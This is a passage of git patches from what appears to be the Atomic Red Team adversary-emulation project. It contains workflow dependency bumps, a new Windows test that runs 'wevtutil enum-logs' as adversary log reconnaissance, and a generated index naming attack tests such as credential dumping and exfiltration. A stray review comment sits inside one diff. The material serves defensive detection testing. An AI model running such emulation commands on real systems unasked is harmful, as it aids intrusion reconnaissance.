From c821a8f785c79dc0af8aa41f6efc6dadefaf3d75 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 18:22:06 -0700 Subject: [PATCH 22/41] Bump actions/stale from 7 to 9 (#2701) Bumps [actions/stale](https://github.com/actions/stale) from 7 to 9. - [Release notes](https://github.com/actions/stale/releases) - [Changelog](https://github.com/actions/stale/blob/main/CHANGELOG.md) - [Commits](https://github.com/actions/stale/compare/v7...v9) --- updated-dependencies: - dependency-name: actions/stale dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Carrie Roberts --- .github/workflows/stale.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml index 0065fa5555..84c7b27c86 100644 --- a/.github/workflows/stale.yml +++ b/.github/workflows/stale.yml @@ -7,7 +7,7 @@ jobs: stale: runs-on: ubuntu-latest steps: - - uses: actions/stale@v7 + - uses: actions/stale@v9 with: stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.' stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.' From d1551ed88f0d553463bb141000c467d1c68d443b Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:22:42 +0000 Subject: [PATCH 23/41] updating atomics count in README.md [ci skip] From 6bb1f1db7cf66381128db8c103bae0d1bf599379 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 20:24:11 -0500 Subject: [PATCH 24/41] Bump actions/upload-artifact from 3 to 4 (#2700) Bumps [actions/upload-artifact](https://github.com/actions/upload-artifact) from 3 to 4. - [Release notes](https://github.com/actions/upload-artifact/releases) - [Commits](https://github.com/actions/upload-artifact/compare/v3...v4) --- updated-dependencies: - dependency-name: actions/upload-artifact dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan --- .github/workflows/validate-atomics.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index a3950021b3..6f54b50026 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml 
@@ -74,7 +74,7 @@ jobs: - name: save labels and reviewers into a file. run: | poetry run python bin/generate_labels.py -t ${{ secrets.GITHUB_TOKEN }} -pr '${{steps.get_pr_number.outputs.result}}' - - uses: actions/upload-artifact@v3 + - uses: actions/upload-artifact@v4 with: name: labels.json path: pr/ \ No newline at end of file From db7e361b03836817ca3fe11a3d7b5def09fa1591 Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:24:52 +0000 Subject: [PATCH 25/41] updating atomics count in README.md [ci skip] From 7125b098c8fc0a31550950995f7641735ae01e54 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 20:28:09 -0500 Subject: [PATCH 26/41] Bump hashicorp/setup-terraform from 2 to 3 (#2699) Bumps [hashicorp/setup-terraform](https://github.com/hashicorp/setup-terraform) from 2 to 3. - [Release notes](https://github.com/hashicorp/setup-terraform/releases) - [Changelog](https://github.com/hashicorp/setup-terraform/blob/main/CHANGELOG.md) - [Commits](https://github.com/hashicorp/setup-terraform/compare/v2...v3) --- updated-dependencies: - dependency-name: hashicorp/setup-terraform dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan --- .github/workflows/validate-atomics.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index 6f54b50026..1afec0a559 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml @@ -31,7 +31,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - uses: hashicorp/setup-terraform@v2 + - uses: hashicorp/setup-terraform@v3 - name: Terraform fmt id: fmt From 29baf7d62ec0227973bcff3da9d502510b65d047 Mon Sep 17 00:00:00 2001 
From: publish bot Date: Sun, 25 Feb 2024 01:28:47 +0000 Subject: [PATCH 27/41] updating atomics count in README.md [ci skip] From 664af47cb0342a002e77022815b1397c37e01c0d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sat, 24 Feb 2024 20:30:07 -0500 Subject: [PATCH 28/41] Bump actions/github-script from 6 to 7 (#2698) Bumps [actions/github-script](https://github.com/actions/github-script) from 6 to 7. - [Release notes](https://github.com/actions/github-script/releases) - [Commits](https://github.com/actions/github-script/compare/v6...v7) --- updated-dependencies: - dependency-name: actions/github-script dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan --- .github/workflows/assign-labels.yml | 4 ++-- .github/workflows/validate-atomics.yml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/assign-labels.yml b/.github/workflows/assign-labels.yml index 1218c71f20..bf4b3fc782 100644 --- a/.github/workflows/assign-labels.yml +++ b/.github/workflows/assign-labels.yml @@ -11,7 +11,7 @@ jobs: runs-on: ubuntu-latest steps: - name: download-artifact - uses: actions/github-script@v6 + uses: actions/github-script@v7 with: script: | let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ @@ -35,7 +35,7 @@ jobs: run: unzip labels.zip - name: assign-labels-and-reviewers - uses: actions/github-script@v6 + uses: actions/github-script@v7 with: script: | let fs = require('fs'); diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index 1afec0a559..b6c63dd267 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml 
@@ -51,7 +51,7 @@ jobs: with: python-version: "3.11.2" cache: "poetry" - - uses: actions/github-script@v6 + - uses: actions/github-script@v7 id: get_pr_number with: script: | From 8daf92f314f73ca0c0a008e96111b06c4d20a360 Mon Sep 17 00:00:00 2001 From: publish bot Date: Sun, 25 Feb 2024 01:30:51 +0000 Subject: [PATCH 29/41] updating atomics count in README.md [ci skip] From 61733d1e9069364a7beb9973ef0f1adcf41f5c47 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 26 Feb 2024 09:07:37 -0600 Subject: [PATCH 30/41] Bump actions/checkout from 3 to 4 (#2705) Bumps [actions/checkout](https://github.com/actions/checkout) from 3 to 4. - [Release notes](https://github.com/actions/checkout/releases) - [Changelog](https://github.com/actions/checkout/blob/main/CHANGELOG.md) - [Commits](https://github.com/actions/checkout/compare/v3...v4) --- updated-dependencies: - dependency-name: actions/checkout dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- .github/workflows/generate-counter.yml | 2 +- .github/workflows/generate-docs.yml | 2 +- .github/workflows/validate-atomics.yml | 6 +++--- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/.github/workflows/generate-counter.yml b/.github/workflows/generate-counter.yml index f9d0d9b8dc..470c55d2d8 100644 --- a/.github/workflows/generate-counter.yml +++ b/.github/workflows/generate-counter.yml @@ -8,7 +8,7 @@ jobs: generate-counter: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }} - name: Install poetry diff --git a/.github/workflows/generate-docs.yml b/.github/workflows/generate-docs.yml index 12abe48b6a..929318a921 100644 --- a/.github/workflows/generate-docs.yml +++ b/.github/workflows/generate-docs.yml 
@@ -8,7 +8,7 @@ jobs: runs-on: ubuntu-latest steps: - name: checkout repo - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }} - name: setup ruby diff --git a/.github/workflows/validate-atomics.yml b/.github/workflows/validate-atomics.yml index b6c63dd267..72b4d63ec3 100644 --- a/.github/workflows/validate-atomics.yml +++ b/.github/workflows/validate-atomics.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - name: checkout repo - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Install poetry run: pipx install poetry - name: setup python3.11 @@ -30,7 +30,7 @@ jobs: validate-terraform: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 - uses: hashicorp/setup-terraform@v3 - name: Terraform fmt @@ -42,7 +42,7 @@ jobs: runs-on: ubuntu-latest steps: - name: checkout repo - uses: actions/checkout@v3 + uses: actions/checkout@v4 - name: Install poetry run: pipx install poetry - name: setup python3.11 From d7cdd5d68a4ca603adb64fc6cf95806441d2dfd0 Mon Sep 17 00:00:00 2001 From: publish bot Date: Mon, 26 Feb 2024 15:08:34 +0000 Subject: [PATCH 31/41] updating atomics count in README.md [ci skip] From a09cebd1a306081f4cb63c7b0910812655268a25 Mon Sep 17 00:00:00 2001 From: chefengineer <40790013+jj-cmyk@users.noreply.github.com> Date: Tue, 27 Feb 2024 02:16:32 +1100 Subject: [PATCH 32/41] Adding new test for T1654 for Enumerate Windows Security Log (#2704) * Adding new test for T1654 for Enumerate Windows Security Log via WevtUtil Adding new test for T1654 for Enumerate Windows Security Log via WevtUtil * Update T1654.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1654/T1654.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/atomics/T1654/T1654.yaml b/atomics/T1654/T1654.yaml index 723bf0eec0..250f7e9697 100644 --- a/atomics/T1654/T1654.yaml +++ b/atomics/T1654/T1654.yaml 
@@ -17,3 +17,16 @@ atomic_tests: cleanup_command: powershell -c "remove-item $env:temp\T1654_events.txt -ErrorAction Ignore" name: powershell elevation_required: true +- name: Enumerate Windows Security Log via WevtUtil + description: |- + WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. + + By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System + as well as any custom logs created by administrators. + + This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration + supported_platforms: + - windows + executor: + command: wevtutil enum-logs + name: command_prompt From 05fc04f419c11b34b0fc78b1ce9a22d6f981ebba Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 26 Feb 2024 15:17:09 +0000 Subject: [PATCH 33/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1654/T1654.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1654/T1654.yaml b/atomics/T1654/T1654.yaml index 250f7e9697..4c672a015c 100644 --- a/atomics/T1654/T1654.yaml +++ b/atomics/T1654/T1654.yaml @@ -18,6 +18,7 @@ atomic_tests: name: powershell elevation_required: true - name: Enumerate Windows Security Log via WevtUtil + auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd description: |- WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index c2bd284c0e..a01fb1e73e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
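Review bot: The test name `Enumerate Windows Security Log via WevtUtil` does not match its command. `wevtutil enum-logs` only lists the names of the registered logs and never reads the Security log, which is what the description itself says ("enumerate all available event logs"). Anyone using this atomic to validate detection of Security-log access would be measuring only a log-name listing, so the name should reflect that, e.g. `name: Enumerate Windows Event Log Names via WevtUtil`. The last description sentence is also missing its closing period. The `atomic_tests:` list starts outside this hunk.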
@@ -1567,3 +1567,4 @@ ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 2d5029f0-ae20-446f-8811-e7511b58e8b6 36c62584-d360-41d6-886f-d194654be7c2 bac8a340-be64-4491-a0cc-0985cb227f5a +fef0ace1-3550-4bf1-a075-9fea55a778dd From 5aef5da2477a35bbb89554a9672be7e347781415 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 26 Feb 2024 15:17:23 +0000 Subject: [PATCH 34/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 14 ++++++++ atomics/Indexes/windows-index.yaml | 14 ++++++++ atomics/T1654/T1654.md | 35 +++++++++++++++++++ 9 files changed, 69 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index bdf1bc9041..f74835998c 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump 
volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path 
(PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate 
Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View 